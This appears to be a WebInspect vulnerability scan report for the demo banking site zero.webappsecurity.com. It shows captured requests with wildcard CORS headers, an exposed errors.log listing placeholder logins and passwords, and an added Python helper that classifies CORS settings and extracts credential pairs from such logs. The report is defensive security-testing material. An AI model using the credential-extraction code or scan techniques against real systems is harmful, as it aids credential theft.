Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1852
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<html>
<head>
<meta name="author" content="Ben Souther" />
<title>Sample Application</title>
</head>
<body>
<h2>Sample Application</h2>
<p>
The example app has been packaged as a war file and can be downloaded
<a href="sample.war">here</a> (Note: make sure your browser doesn't
change file extension or append a new one).
</p>
<p>
The easiest way to run this application is simply to move the war file
to your <b>CATALINA_HOME/webapps</b> directory. Tomcat will automatically
expand and deploy the application for you. You can view it with the
following URL (assuming that you're running tomcat on port 8080
as is the default):
<br />
<a href="http://localhost:8080/sample">http://localhost:8080/sample</a>
</p>
<p>
If you just want to browse the contents, you can unpack the war file
with the <b>jar</b> command.
</p>
<pre>
jar -xvf sample.war
</pre>
</body>
</html>
Page:

http://zero.webappsecurity.com:80/errors/errors.log

Request:
GET /errors/errors.log HTTP/1.1
Referer: http://zero.webappsecurity.com/errors/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C32128A8498A56E4E6435B6994687E3A";
PSID="BB23AC8A7B9C89C3DE9576C0FEACCA3F"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
X-Request-Memo: ID="7fb39035-d4ae-41aa-a0e7-7b0907724343"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21684-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 21684
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Tue Jan 22 09:11:32 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Suspendisse] and password [Nunc].
Tue Jan 22 09:31:20 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [pede] and password [Donec].
Tue Jan 22 10:49:37 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [magna.] and password [eget].
Tue Jan 22 11:55:56 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [sed] and password [risus].
Tue Jan 22 13:45:58 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Aliquam] and password [Morbi].
Tue Jan 22 14:55:38 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [eu] and password [arcu.].
Tue Jan 22 16:12:29 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Morbi] and password [non,].
Tue Jan 22 18:51:49 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [tellus] and password [parturient].
Tue Jan 22 18:55:01 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [enim,] and password [vitae].
Tue Jan 22 18:57:25 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [sapien.] and password [laoreet].
Tue Jan 22 21:26:23 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [leo.] and password [amet].
Tue Jan 22 22:26:38 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [commodo] and password [natoque].
Wed Jan 23 01:11:37 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [vitae,] and password [vel,].
Wed Jan 23 03:15:20 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Suspendisse] and password [Nunc].
Wed Jan 23 05:39:52 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [ipsum.] and password [Proin].
Wed Jan 23 07:02:30 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [enim.] and password [non,].
Wed Jan 23 08:28:32 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [at] and password [enim.].
Wed Jan 23 10:08:34 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.U
...TRUNCATED...

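Two things are visible in the captured responses under this finding: every response carries Access-Control-Allow-Origin: * (the CORS condition WebInspect flags), and /errors/errors.log is served unauthenticated as text/plain with login and password values written into each failed-authentication line. The wildcard on its own is less severe than it looks, because browsers never attach cookies or other credentials to a request that is answered with a wildcard origin, so a hostile page can only read what an anonymous client could already fetch. That is exactly why the log matters more than the header here: the log is anonymous content, so any origin can read it cross-site. The helper below is an added example, not part of the WebInspect report or of the zero.webappsecurity.com application. It parses raw responses in the form shown above, classifies the CORS posture (going beyond the wildcard case on this page to the reflected-origin-with-credentials case a reviewer should also look for), and extracts credential pairs in the errors.log format. The sample responses are trimmed copies of the captured ones, the "hardened" response and the origin https://app.example.test are hypothetical, and all function names are our own.

```python
"""Triage helpers for the captured responses: CORS posture and logged credentials.

Added example; not code from the report or the scanned application.
"""
import re
from typing import Dict, List, Optional, Tuple

# Trimmed copy of the captured /errors/errors.log response (sample data).
ERRORS_LOG_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Access-Control-Allow-Origin: *\r\n"
    "Content-Type: text/plain;charset=UTF-8\r\n"
    "\r\n"
    "Tue Jan 22 09:11:32 EST 2013 [ERROR] [local 10.5.157.10] "
    "[com.zero.bank.auth.UserAuthenticator.authenticate (UserAuthenticator.java:51)]"
    " - Not possible to authenticate a user with login [Suspendisse] and password [Nunc].\n"
    "Tue Jan 22 09:31:20 EST 2013 [ERROR] [local 10.5.157.10] "
    "[com.zero.bank.auth.UserAuthenticator.authenticate (UserAuthenticator.java:51)]"
    " - Not possible to authenticate a user with login [pede] and password [Donec].\n"
)

# Hypothetical hardened response for comparison (not captured from the target):
# a single allow-listed origin plus Vary: Origin so caches keep responses apart.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Access-Control-Allow-Origin: https://app.example.test\r\n"
    "Vary: Origin\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "ok\n"
)


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def assess_cors(headers: Dict[str, str], request_origin: Optional[str] = None) -> str:
    """Classify the CORS posture of one response.

    'none'                  no ACAO header; browsers block cross-origin reads
    'wildcard'              ACAO: *; any origin may read, but browsers send no
                            cookies or credentials with a wildcard answer
    'wildcard+credentials'  ACAO: * with ACAC: true; browsers reject the
                            combination, it only signals a misconfiguration
    'reflected+credentials' ACAO echoes the caller's Origin with ACAC: true;
                            authenticated content is readable cross-origin
    'allowlisted'           a specific origin
    """
    acao = headers.get("access-control-allow-origin")
    creds = headers.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "none"
    if acao == "*":
        return "wildcard+credentials" if creds else "wildcard"
    if request_origin is not None and acao == request_origin and creds:
        return "reflected+credentials"
    return "allowlisted"


# Matches the UserAuthenticator line format seen in errors.log.
LOG_CRED_RE = re.compile(r"login \[(?P<login>[^\]]*)\] and password \[(?P<password>[^\]]*)\]")


def find_logged_credentials(body: str) -> List[Tuple[str, str]]:
    """Return every (login, password) pair the application wrote into the log body."""
    return [(m.group("login"), m.group("password")) for m in LOG_CRED_RE.finditer(body)]


def triage(raw: str) -> Dict[str, object]:
    """Combine both checks for one captured response."""
    status, headers, body = parse_response(raw)
    return {
        "status": status,
        "cors": assess_cors(headers),
        "credentials_logged": find_logged_credentials(body),
    }


if __name__ == "__main__":
    for name, raw in (("errors.log", ERRORS_LOG_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, triage(raw))
```

The fix is two separate changes: stop serving /errors/ from the web root (and stop logging submitted passwords at all), and replace the blanket wildcard with an explicit origin allow list plus Vary: Origin on any endpoint that genuinely needs cross-origin reads. Retest with an Origin header from a non-allow-listed site and confirm the response carries no Access-Control-Allow-Origin at all.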
Page:

http://zero.webappsecurity.com:80/docs/appdev/sample/sample.war

Request:
GET /docs/appdev/sample/sample.war HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/sample/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C80E2163C3B058B420F9C08BCCC51C62";
PSID="B2C4DB9BD43BD67F563C5590060864D1"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="3e19822b-2222-489c-ab42-6a4446fc16ce";
X-Request-Memo: ID="686c8472-e5a7-47a0-b06b-7f9b9014ae51"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"4606-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Length: 51
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/plain
<truncated>application/x-zip-compressed</truncated>
Page:

http://zero.webappsecurity.com:80/docs/tribes/introduction.html

Request:
GET /docs/tribes/introduction.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="CD5E19BE8CC24688BC7308F171997466";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="07f7b923-6839-4ba7-a938-9cf0c5eb1f61";
X-Request-Memo: ID="040cfd4a-ab06-4d31-975e-edb1f8a6adf6"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:00 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"23070-1466008840000"
Last-Modified: Wed, 15 Jun 2016 16:40:40 GMT
Content-Type: text/html
Content-Length: 23070
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tribes - The Tomcat
Cluster Communication Module (7.0.70) - Apache Tribes - Introduction</title><meta name="author" content="Filip
Hanik"><style type="text/css" media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}
table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="Apache Tomcat"
border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="introduction.html">Tribes Docs Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>User Guide</strong></p><ul><li><a
href="introduction.html">1) Introduction</a></li><li><a href="setup.html">2) Setup</a></li><li><a href="faq.html">3)
FAQ</a></li></ul><p><strong>Reference</strong></p><ul><li><a href="../api/org/apache/catalina/tribes/package-summary.html">JavaDoc</a></li></ul><p><strong>Apache Tribes Development</strong></p><ul><li><a
href="membership.html">Membership</a></li><li><a href="transport.html">Transport</a></li><li><a
href="interceptors.html">Interceptors</a></li><li><a href="status.html">Status</a></li><li><a
href="developers.html">Developers
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/jspapi/

Request:
GET /docs/jspapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jspapi/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="EFDF7B892053C63944C29F6DB63E233F";
PSID="2972AA34C8A6AF245A423BC19C9CD9CE"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="87"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="55"; smi="0"; sc="1"; ID="4a1bd4fa-cd49-4e66-837e-8b448b07f7aa";
X-Request-Memo: ID="e073da79-b7e8-42ec-9389-f20a64c9afb8"; sc="1"; ThreadId="109";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=B17F0383
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:17 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1319-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1319
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The JSP Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/servletapi/

Request:
GET /docs/servletapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/servletapi/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="564F2A0E64C26817838EE110967EF96E";
PSID="9A374CF6133C82D2A83C2624AADBEB16"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="94"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="8c384aa4-7d63-40e1-baeb-f27f8d05ff65";
X-Request-Memo: ID="2477b30e-219c-4fe7-a1bb-9e26b2e4e406"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=FF9EF2E4
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1323-1466008840000"
Last-Modified: Wed, 15 Jun 2016 16:40:40 GMT
Content-Type: text/html
Content-Length: 1323
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The Servlet Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/websocketapi/index.html

Request:
GET /docs/websocketapi/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="5BE22692ADEF2CF19E101E8F2AE21ECC";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="8c9ad5e8-9310-4e09-a3da-be5bb8929c4e";
X-Request-Memo: ID="7da23acc-570f-4b66-b0a5-b08d359e7995"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1185-1466008840000"
Last-Modified: Wed, 15 Jun 2016 16:40:40 GMT
Content-Type: text/html
Content-Length: 1185
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>API docs</title>
</head>
<body>
The WebSocket Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
Report Date: 10/10/2016

55

</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/architecture/index.html

Request:
GET /docs/architecture/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="629E4A1BA8397C370A60A994699A4485";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4c216e81-685e-4aac-878e-79af3584075a";
X-Request-Memo: ID="13cc48eb-9f89-48aa-a925-efa249ba4019"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:54 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"7656-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 7656
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7
Architecture (7.0.70) - Table of Contents</title><meta name="author" content="Yoav Shapira"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Architecture Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Contents</strong></p><ul><li><a
href="index.html">Contents</a></li><li><a href="overview.html">Overview</a></li><li><a href="startup.html">Server
Startup</a></li><li><a href="requestProcess.html">Request Process</a></li></ul></td><!--RIGHT SIDE MAIN BODY--><td
width="80%" valign="top" align="left" id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0"
cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff" face="arial,helvetica.sanserif"><a
